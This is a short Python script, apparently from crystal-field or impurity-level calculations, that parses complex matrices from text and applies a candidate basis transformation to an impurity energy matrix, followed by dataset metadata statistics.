2019-12-13T13:54:11.000Z
|
# Python 3 version of the original Python 2 helpers; the names that previously
# came from "from scipy import *" are imported explicitly from NumPy.
from numpy import array, conj, imag, matrix, real, shape
from scipy import linalg

def mprint(Us):
    """Print a complex matrix as 're im' pairs, one row per line."""
    for i in range(shape(Us)[0]):
        for j in range(shape(Us)[1]):
            print("%9.6f %9.6f " % (real(Us[i, j]), imag(Us[i, j])), end="")
        print()

def StringToMatrix(cfstr):
    """Parse whitespace-separated 're im' number pairs into a complex matrix."""
    mm = []
    for line in cfstr.split('\n'):
        line = line.strip()
        if line:
            data = array([float(x) for x in line.split()])
            mm.append(data[0::2] + data[1::2] * 1j)
    return matrix(mm)
sT2C="""
0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
-0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
sT2C="""
0.000000 0.000000 1.000000 -0.000000 0.000000 0.000000 -0.000000 0.000000 -0.000000 -0.000000 0.000000 -0.000000 0.000000 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
0.000000 0.000000 0.000000 -0.000000 0.000000 -0.000000 -0.000000 0.000000 -0.000000 -0.000000 -0.000000 -0.000000 0.000000 -0.000000 0.000000 -0.000000 1.000000 0.000000 0.000000 0.000000
-0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.692963 -0.000000 0.000000 0.000000 -0.366607 0.354260 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.366607 -0.354260
0.366607 0.354260 -0.000000 0.000000 0.000000 0.000000 -0.000000 0.000000 -0.366607 -0.354260 0.000000 -0.000000 0.692963 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
-0.000000 0.000000 0.000000 -0.000000 0.000000 0.000000 0.720973 0.000000 0.000000 0.000000 0.352364 -0.340497 -0.000000 -0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.352364 0.340497
-0.352364 -0.340497 0.000000 -0.000000 0.000000 0.000000 -0.000000 0.000000 0.352364 0.340497 0.000000 -0.000000 0.720973 0.000000 0.000000 0.000000 -0.000000 -0.000000 -0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 -1.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000
0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.707107 0.000000
"""
sT2C="""
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.72097658 -0.00000000 0.00000000 0.00000000 0.35236224 -0.34049559 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.35236224 0.34049559
-0.35236224 -0.34049559 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.35236224 0.34049559 0.00000000 -0.00000000 0.72097658 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.69295944 0.00000000 0.00000000 0.00000000 -0.36660865 0.35426221 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.36660865 -0.35426221
0.36660865 0.35426221 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.00000000 -0.36660865 -0.35426221 0.00000000 0.00000000 0.69295944 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
sEimp0="""
-1.60596 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.80166 -0.74845 0.00000 0.00000 -0.37295 -0.37079 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 -2.28610 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.46960 -0.46848 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 -0.10607 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.46960 -0.46848 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -1.77172 0.00000 0.00000 0.00000 -0.00101 -0.01135 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.37295 -0.37079
0.80166 0.74845 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.51129 0.00000 0.00000 0.00000 -0.00101 -0.01135 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.00101 0.01135 0.00000 0.00000 -0.51129 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.80166 -0.74845
-0.37295 0.37079 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.00101 0.01135 0.00000 0.00000 -1.77172 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 -0.46960 0.46848 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.10607 0.00000 0.00000 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 -0.46960 0.46848 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -2.28610 0.00000 0.00000 0.00000
0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -0.37295 0.37079 0.00000 0.00000 0.80166 0.74845 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 -1.60596 0.00000
"""
Eimp0 = StringToMatrix(sEimp0)
T2C = StringToMatrix(sT2C)
print('Det=', linalg.det(T2C))
REimp1 = conj(T2C) * Eimp0 * T2C.T
mprint( REimp1 )
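# Editorial note: REimp1 = conj(T2C) * Eimp0 * T2C.T applies the candidate
# transformation T2C as a basis change to the impurity level matrix Eimp0.
# If T2C is the intended crystal-field rotation, the printed REimp1 should be
# (nearly) diagonal; large off-diagonal entries indicate a wrong rotation.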
| 133.3
| 260
| 0.615529
| 1,696
| 10,664
| 3.870283
| 0.044222
| 0.485375
| 0.527118
| 0.866545
| 0.943175
| 0.943175
| 0.943175
| 0.943175
| 0.941956
| 0.941956
| 0
| 0.82005
| 0.288166
| 10,664
| 79
| 261
| 134.987342
| 0.044658
| 0
| 0
| 0.217391
| 0
| 0.57971
| 0.939422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028986
| null | null | 0.072464
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|